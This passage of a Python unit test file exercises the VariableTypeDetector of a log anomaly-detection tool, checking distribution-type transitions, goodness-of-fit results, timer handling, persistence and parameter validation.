""" # load data with open("unit/data/vtd_data/nor_data_test6", "rb") as f: nor_data_list = pickle.load(f) with open("unit/data/vtd_data/beta1_data_test6", "rb") as f: beta1_data_list = pickle.load(f) with open("unit/data/vtd_data/uni_data_test6", "rb") as f: uni_data_list = pickle.load(f) nor_data_list = nor_data_list*10 beta1_data_list = beta1_data_list*10 vtd_arguments = [(50, 30), (75, 50), (100, 50), (100, 75), (100, 100)] for init, update in vtd_arguments: etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0) t = time.time() stat_data = b"True" log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) # initialize data for i in range(init): self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(["stat", [stat_data.decode()], True], result, (init, update, result)) # static -> static for i in range(update): self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(["stat", [stat_data.decode()], True], result, (init, update, result)) # static -> uni for uni_data in uni_data_list[2*update:4*update]: uni_data = str(uni_data) encoded_data = uni_data.encode() log_atom = LogAtom(encoded_data, ParserMatch(MatchElement(self.path, encoded_data, uni_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] pos_distr = vtd.alternative_distribution_types[0][0] self.assertTrue(result[0] == "uni" or "uni" in [distr[0] for distr in pos_distr], (init, update, result)) # uni -> others for i in range(update): stat_data = bytes(str((i % int(update / 5))), "utf-8") log_atom = LogAtom(stat_data, 
ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(["others", 0], result, (init, update, result)) # others -> d for i in range(update): stat_data = bytes(str((i % int(update / 5))), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual("d", result[0], (init, update, result)) # reset all etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0, num_d_bt=30) # initialize with d for i in range(init): stat_data = bytes(str((i % int(update / 5))), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual("d", result[0], (init, update, result)) # discrete to others with new values for uni_data in [i / update for i in range(update)]: uni_data = str(uni_data) encoded_data = uni_data.encode() log_atom = LogAtom(encoded_data, ParserMatch(MatchElement(self.path, encoded_data, uni_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(["others", 0], result, (init, update, result)) # reset all etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, 
div_thres=0.45, sim_thres=0.75, num_pause_others=0, num_d_bt=20) # initialize with d for i in range(init): stat_data = bytes(str((i % int(update / 5))), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual("d", result[0], (init, update, result)) # discrete to others without new values, low num_d_bt for i in range(update): stat_data = bytes(str((i % int(update / 20))), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(["others", 0], result, (init, update, result)) # reset all etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0, num_d_bt=100) # initialize with d for i in range(init): stat_data = bytes(str((i % int(update / 5))), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual("d", result[0], (init, update, result)) # discrete to others without new values, high num_d_bt for i in range(update): stat_data = bytes(str((i % int(update / 20))), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertNotEqual(["others", 0], result, (init, update, result)) # reset all etd = 
EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0) t = time.time() stat_data = b"True" log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) # initialize data for i in range(init): self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(["stat", [stat_data.decode()], True], result, (init, update, result)) # static -> asc for i in range(2*update): stat_data = bytes(str(i * 0.1), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(["asc", "float"], result, (init, update, result)) # asc -> desc for i in range(2*update, 0, -1): stat_data = bytes(str(i * 0.1), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(["desc", "float"], result, (init, update, result)) # reset all etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0) t = time.time() stat_data = b"True" log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) # initialize data for i in range(init): self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = 
vtd.var_type[0][0] self.assertEqual(["stat", [stat_data.decode()], True], result, (init, update, result)) # static -> nor for nor_data in nor_data_list[update:3*update]: nor_data = str(nor_data) encoded_data = str(nor_data).encode() log_atom = LogAtom(encoded_data, ParserMatch(MatchElement(self.path, encoded_data, nor_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] pos_distr = vtd.alternative_distribution_types[0][0] self.assertTrue(result[0] == "nor" or "nor" in [distr[0] for distr in pos_distr], (init, update, result)) # nor -> beta1 for beta1_data in beta1_data_list[:2*update]: beta1_data = str(beta1_data) encoded_data = beta1_data.encode() log_atom = LogAtom(encoded_data, ParserMatch(MatchElement(self.path, encoded_data, beta1_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] pos_distr = vtd.alternative_distribution_types[0][0] self.assertTrue((result[0] == "beta" and result[-1] == 1) or "beta1" in [distr[0]+str(distr[-1]) for distr in pos_distr], (init, update, result)) # reset all etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0) t = time.time() stat_data = b"True" log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) # initialize data for _ in range(init): self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(["stat", [stat_data.decode()], True], result, (init, update, result)) # static -> unq vtd.test_gof_int = False unq_data_list = [bytes(str(i), "utf-8") for i in range(2*update)] random.shuffle(unq_data_list) for 
unq_data in unq_data_list: log_atom = LogAtom(unq_data, ParserMatch(MatchElement(self.path, unq_data, unq_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual("unq", result[0], (init, update, result)) def test7update_continuous_VT(self): """ This unittest tests the s_gof_test method. It uses randomised datasets, which can be printed in the terminal. Every distribution has generated 30*300 Datasets and var_ev = 0, var_var = 1. """ # Number of execution of the tested function iterations = 20 # Size of the initial datasample dataset_size_ini = 100 # Size of the update datasample dataset_size_upd = 50 # Significance level significance_niveau = 0.05 # load data with open("unit/data/vtd_data/uni_data_test7", "rb") as f: [uni_data_list_ini, uni_data_list_upd, uni_result_shapes_ks, uni_result_shapes_cm] = pickle.load(f) with open("unit/data/vtd_data/nor_data_test7", "rb") as f: [nor_data_list_ini, nor_data_list_upd, nor_result_shapes_ks, nor_result_shapes_cm] = pickle.load(f) with open("unit/data/vtd_data/beta1_data_test7", "rb") as f: [beta1_data_list_ini, beta1_data_list_upd, beta1_result_shapes_ks, beta1_result_shapes_cm] = pickle.load(f) with open("unit/data/vtd_data/beta2_data_test7", "rb") as f: [beta2_data_list_ini, beta2_data_list_upd, beta2_result_shapes_ks, beta2_result_shapes_cm] = pickle.load(f) with open("unit/data/vtd_data/beta3_data_test7", "rb") as f: [beta3_data_list_ini, beta3_data_list_upd, beta3_result_shapes_ks, beta3_result_shapes_cm] = pickle.load(f) with open("unit/data/vtd_data/beta4_data_test7", "rb") as f: [beta4_data_list_ini, beta4_data_list_upd, beta4_result_shapes_ks, beta4_result_shapes_cm] = pickle.load(f) with open("unit/data/vtd_data/beta5_data_test7", "rb") as f: [beta5_data_list_ini, beta5_data_list_upd, beta5_result_shapes_ks, beta5_result_shapes_cm] = pickle.load(f) etd = EventTypeDetector(self.aminer_config, 
[self.stream_printer_event_handler]) vtd_ks = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=dataset_size_ini, num_update=dataset_size_upd, gof_alpha=significance_niveau, used_gof_test="KS") vtd_cm = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=dataset_size_ini, num_update=dataset_size_upd, gof_alpha=significance_niveau, used_gof_test="CM") result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): # Create the initial distribution, which has to pass the initial test variable_type_ini = vtd_ks.detect_continuous_shape(uni_data_list_ini[i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == "uni": variable_type_ini = variable_type_ini[:-1] elif "uni" in [distr[0] for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == "uni": variable_type_ini = distr else: variable_type_ini = ["others", 0] # Test and save the result of the s_gof-Test etd.values = [[uni_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_ks.var_type = [[variable_type_ini]] result_list_ks.append(vtd_ks.s_gof_test(0, 0, True)[0]) variable_type_ini = vtd_cm.detect_continuous_shape(uni_data_list_ini[i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == "uni": variable_type_ini = variable_type_ini[:-1] elif "uni" in [distr[0] for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == "uni": variable_type_ini = distr else: variable_type_ini = ["others", 0] # Test and save the result of the s_gof-Test etd.values = [[uni_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_cm.var_type = [[variable_type_ini]] result_list_cm.append(vtd_cm.s_gof_test(0, 0, True)[0]) # Test if the result list is correct self.assertTrue(result_list_ks == uni_result_shapes_ks) self.assertTrue(result_list_cm == 
uni_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): # Create the initial distribution, which has to pass the initial test variable_type_ini = vtd_ks.detect_continuous_shape(nor_data_list_ini[i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == "nor": variable_type_ini = variable_type_ini[:-1] elif "nor" in [distr[0] for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == "nor": variable_type_ini = distr else: variable_type_ini = ["others", 0] # Test and save the result of the s_gof-Test etd.values = [[nor_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_ks.var_type = [[variable_type_ini]] result_list_ks.append(vtd_ks.s_gof_test(0, 0, True)[0]) variable_type_ini = vtd_cm.detect_continuous_shape(nor_data_list_ini[i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == "nor": variable_type_ini = variable_type_ini[:-1] elif "nor" in [distr[0] for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == "nor": variable_type_ini = distr else: variable_type_ini = ["others", 0] # Test and save the result of the s_gof-Test etd.values = [[nor_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_cm.var_type = [[variable_type_ini]] result_list_cm.append(vtd_cm.s_gof_test(0, 0, True)[0]) # Test if the result list is correct self.assertTrue(result_list_ks == nor_result_shapes_ks) self.assertTrue(result_list_cm == nor_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): # Create the initial distribution, which has to pass the initial test variable_type_ini = vtd_ks.detect_continuous_shape(beta1_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == "beta" and 
variable_type_ini[-2] == 1: variable_type_ini = variable_type_ini[:-1] elif "beta1" in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == "beta" and distr[-1] == 1: variable_type_ini = distr else: variable_type_ini = ["others", 0] # Test and save the result of the s_gof-Test etd.values = [[beta1_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_ks.var_type = [[variable_type_ini]] result_list_ks.append(vtd_ks.s_gof_test(0, 0, True)[0]) variable_type_ini = vtd_cm.detect_continuous_shape(beta1_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == "beta" and variable_type_ini[-2] == 1: variable_type_ini = variable_type_ini[:-1] elif "beta1" in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == "beta" and distr[-1] == 1: variable_type_ini = distr else: variable_type_ini = ["others", 0] # Test and save the result of the s_gof-Test etd.values = [[beta1_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_cm.var_type = [[variable_type_ini]] result_list_cm.append(vtd_cm.s_gof_test(0, 0, True)[0]) # Test if the result list is correct self.assertTrue(result_list_ks == beta1_result_shapes_ks) self.assertTrue(result_list_cm == beta1_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): # Create the initial distribution, which has to pass the initial test variable_type_ini = vtd_ks.detect_continuous_shape(beta2_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == "beta" and variable_type_ini[-2] == 2: variable_type_ini = variable_type_ini[:-1] elif "beta2" in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == "beta" and distr[-1] == 2: variable_type_ini = distr else: 
variable_type_ini = ["others", 0] # Test and save the result of the s_gof-Test etd.values = [[beta2_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_ks.var_type = [[variable_type_ini]] result_list_ks.append(vtd_ks.s_gof_test(0, 0, True)[0]) variable_type_ini = vtd_cm.detect_continuous_shape(beta2_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == "beta" and variable_type_ini[-2] == 2: variable_type_ini = variable_type_ini[:-1] elif "beta2" in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == "beta" and distr[-1] == 2: variable_type_ini = distr else: variable_type_ini = ["others", 0] # Test and save the result of the s_gof-Test etd.values = [[beta2_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_cm.var_type = [[variable_type_ini]] result_list_cm.append(vtd_cm.s_gof_test(0, 0, True)[0]) # Test if the result list is correct self.assertTrue(result_list_ks == beta2_result_shapes_ks) self.assertTrue(result_list_cm == beta2_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): # Create the initial distribution, which has to pass the initial test variable_type_ini = vtd_ks.detect_continuous_shape(beta3_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == "beta" and variable_type_ini[-2] == 3: variable_type_ini = variable_type_ini[:-1] elif "beta3" in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == "beta" and distr[-1] == 3: variable_type_ini = distr else: variable_type_ini = ["others", 0] # Test and save the result of the s_gof-Test etd.values = [[beta3_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_ks.var_type = [[variable_type_ini]] result_list_ks.append(vtd_ks.s_gof_test(0, 0, True)[0]) 
variable_type_ini = vtd_cm.detect_continuous_shape(beta3_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == "beta" and variable_type_ini[-2] == 3: variable_type_ini = variable_type_ini[:-1] elif "beta3" in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == "beta" and distr[-1] == 3: variable_type_ini = distr else: variable_type_ini = ["others", 0] # Test and save the result of the s_gof-Test etd.values = [[beta3_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_cm.var_type = [[variable_type_ini]] result_list_cm.append(vtd_cm.s_gof_test(0, 0, True)[0]) # Test if the result list is correct self.assertTrue(result_list_ks == beta3_result_shapes_ks) self.assertTrue(result_list_cm == beta3_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): # Create the initial distribution, which has to pass the initial test variable_type_ini = vtd_ks.detect_continuous_shape(beta4_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == "beta" and variable_type_ini[-2] == 4: variable_type_ini = variable_type_ini[:-1] elif "beta4" in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == "beta" and distr[-1] == 4: variable_type_ini = distr else: variable_type_ini = ["others", 0] # Test and save the result of the s_gof-Test etd.values = [[beta4_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_ks.var_type = [[variable_type_ini]] result_list_ks.append(vtd_ks.s_gof_test(0, 0, True)[0]) variable_type_ini = vtd_cm.detect_continuous_shape(beta4_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == "beta" and variable_type_ini[-2] == 4: variable_type_ini = variable_type_ini[:-1] elif "beta4" in 
[distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == "beta" and distr[-1] == 4: variable_type_ini = distr else: variable_type_ini = ["others", 0] # Test and save the result of the s_gof-Test etd.values = [[beta4_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_cm.var_type = [[variable_type_ini]] result_list_cm.append(vtd_cm.s_gof_test(0, 0, True)[0]) # Test if the result list is correct self.assertTrue(result_list_ks == beta4_result_shapes_ks) self.assertTrue(result_list_cm == beta4_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): # Create the initial distribution, which has to pass the initial test variable_type_ini = vtd_ks.detect_continuous_shape(beta5_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == "beta" and variable_type_ini[-2] == 5: variable_type_ini = variable_type_ini[:-1] elif "beta5" in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == "beta" and distr[-1] == 5: variable_type_ini = distr else: variable_type_ini = ["others", 0] # Test and save the result of the s_gof-Test etd.values = [[beta5_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]] vtd_ks.var_type = [[variable_type_ini]] result_list_ks.append(vtd_ks.s_gof_test(0, 0, True)[0]) variable_type_ini = vtd_cm.detect_continuous_shape(beta5_data_list_ini[ i * dataset_size_ini:(i + 1) * dataset_size_ini]) if variable_type_ini[0] == "beta" and variable_type_ini[-2] == 5: variable_type_ini = variable_type_ini[:-1] elif "beta5" in [distr[0]+str(distr[-1]) for distr in variable_type_ini[-1]]: for distr in variable_type_ini[-1]: if distr[0] == "beta" and distr[-1] == 5: variable_type_ini = distr else: variable_type_ini = ["others", 0] # Test and save the result of the s_gof-Test etd.values = 
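[[beta5_data_list_upd[i * dataset_size_upd:(i + 1) * dataset_size_upd]]]
            vtd_cm.var_type = [[variable_type_ini]]
            result_list_cm.append(vtd_cm.s_gof_test(0, 0, True)[0])
        # Test if the result list is correct
        self.assertTrue(result_list_ks == beta5_result_shapes_ks)
        self.assertTrue(result_list_cm == beta5_result_shapes_cm)

    def test8do_timer(self):
        """
        Test if the do_timer method is implemented properly.

        The detector is given a next_persist_time 400s in the future; do_timer must return the remaining
        seconds until then, fire persistence when the deadline is reached (returning the full
        DEFAULT_PERSISTENCE_PERIOD) and then count down towards the newly scheduled deadline.
        """
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd)
        t = time.time()
        vtd.next_persist_time = t + 400
        # Before the deadline only the remaining time is reported.
        self.assertEqual(vtd.do_timer(t + 200), 200)
        # Reaching the deadline persists and re-arms the timer for a full period.
        self.assertEqual(vtd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD)
        # The new deadline is t + 400 + DEFAULT_PERSISTENCE_PERIOD; express the probe times relative to it
        # instead of hard-coding 999/1000, so the test does not silently depend on the period being 600s.
        next_deadline = t + 400 + DEFAULT_PERSISTENCE_PERIOD
        self.assertEqual(vtd.do_timer(next_deadline - 1), 1)
        self.assertEqual(vtd.do_timer(next_deadline), DEFAULT_PERSISTENCE_PERIOD)

    def test9persistence(self):
        """
        Test the do_persist and load_persistence_data methods.

        The detector is driven through the type transitions static -> static -> uni -> others -> d, the learned
        state is persisted, the raw persistence file content is checked, the state is reloaded into the same
        instance and finally compared against a second detector built with the same arguments (which is
        expected to pick up the persisted state, presumably on construction).
        """
        # Load the fixture. pickle.load is only acceptable here because the file is repo-controlled test data
        # shipped with the suite; it must never be pointed at user-supplied input.
        with open("unit/data/vtd_data/uni_data_test6", "rb") as f:
            uni_data_list = pickle.load(f)
        init = 100
        update = 100
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update,
                                   num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0)
        t = time.time()

        def feed(log_atom):
            # Every atom must be accepted by the event type detector before the variable type detector sees it.
            self.assertTrue(etd.receive_atom(log_atom))
            vtd.receive_atom(log_atom)

        def discrete_atoms():
            # update // 5 distinct values cycling through 0..19 (for update == 100); this is exactly the
            # discrete distribution the expected 'd' state below encodes.
            for i in range(update):
                value = str(i % (update // 5)).encode("utf-8")
                yield LogAtom(value, ParserMatch(MatchElement(self.path, value, value, None)), t, self.__class__.__name__)

        stat_data = b"True"
        log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__)
        # initialize data
        for _ in range(init):
            feed(log_atom)
        result = vtd.var_type[0][0]
        self.assertEqual(["stat", [stat_data.decode()], True], result, (init, update, result))
        # static -> static
        for _ in range(update):
            feed(log_atom)
        result = vtd.var_type[0][0]
        self.assertEqual(["stat", [stat_data.decode()], True], result, (init, update, result))
        # static -> uni
        for uni_data in uni_data_list[2 * update:4 * update]:
            uni_data = str(uni_data)
            encoded_data = uni_data.encode()
            log_atom = LogAtom(encoded_data, ParserMatch(MatchElement(self.path, encoded_data, uni_data, None)), t, self.__class__.__name__)
            feed(log_atom)
        result = vtd.var_type[0][0]
        pos_distr = vtd.alternative_distribution_types[0][0]
        # "uni" may either be the detected type or one of the alternative candidates.
        self.assertTrue(result[0] == "uni" or "uni" in [distr[0] for distr in pos_distr], (init, update, result))
        # uni -> others
        for log_atom in discrete_atoms():
            feed(log_atom)
        result = vtd.var_type[0][0]
        self.assertEqual(["others", 0], result, (init, update, result))
        # others -> d
        for log_atom in discrete_atoms():
            feed(log_atom)
        result = vtd.var_type[0][0]
        self.assertEqual("d", result[0], (init, update, result))

        # Expected learned state: 20 equally likely discrete values 0.0..19.0, seen 100 times.
        expected_var_type = [[['d', [float(i) for i in range(20)], [0.05] * 20, 100]]]
        expected_history = [[[[0, 0, 1, 0, 1, 0], [1, 1, 0, 0, 0, 0], [[0, 0, 0, 0, 0, 1], [0, 0, 0, 0, 0, 0]], [0, 0, 0, 0, 0, 0],
                              [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0], [[0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0]],
                              [[0, 0, 0, -0.15555384791577725, 0, 0], [0, 0, 0, 0.5762564151199925, 0, 0]]]]]

        def assert_learned_state(detector):
            # The same state must be observable before persisting and after reloading.
            self.assertEqual(detector.var_type, expected_var_type)
            self.assertEqual(detector.alternative_distribution_types, [[[]]])
            self.assertEqual(detector.var_type_history_list, expected_history)
            self.assertEqual(detector.var_type_history_list_reference, [])
            self.assertEqual(detector.failed_indicators, [])
            self.assertEqual(detector.distr_val, [[[]]])

        assert_learned_state(vtd)
        vtd.do_persist()
        # The persisted file is plain JSON; the content is ASCII, so the encoding is pinned to keep the read locale-independent.
        with open(vtd.persistence_file_name, "r", encoding="utf-8") as f:
            self.assertEqual(f.read(), '[[[["string:d", [0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0, 10.0, 11.0, 12.0, 13.0, 14.0, 15.0, 16.0, 17.0, 18.0, 19.0], [0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05], 100]]], [[[]]], [[[[0, 0, 1, 0, 1, 0], [1, 1, 0, 0, 0, 0], [[0, 0, 0, 0, 0, 1], [0, 0, 0, 0, 0, 0]], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0], [[0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0]], [[0, 0, 0, -0.15555384791577725, 0, 0], [0, 0, 0, 0.5762564151199925, 0, 0]]]]], [], [], [[[]]]]')
        vtd.load_persistence_data()
        assert_learned_state(vtd)
        # A fresh detector with identical arguments must end up with the same state as the persisted one.
        other = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update,
                                     num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0)
        self.assertEqual(vtd.var_type, other.var_type)
        self.assertEqual(vtd.alternative_distribution_types, other.alternative_distribution_types)
        self.assertEqual(vtd.var_type_history_list, other.var_type_history_list)
        self.assertEqual(vtd.var_type_history_list_reference, other.var_type_history_list_reference)
        self.assertEqual(vtd.failed_indicators, other.failed_indicators)
        self.assertEqual(vtd.distr_val, other.distr_val)

    def test10validate_parameters(self):
        """Test all initialization parameters for the detector. Input parameters must be validated in the class."""
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, ["default"], etd)
        self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, None, etd)
        self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, "", etd)
        self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, b"Default", etd)
        self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, True, etd)
        self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, 123, etd)
        self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, 123.3, etd)
        self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, {"id": "Default"}, etd)
        self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, (), etd)
        self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, set(), etd)
        self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], "")
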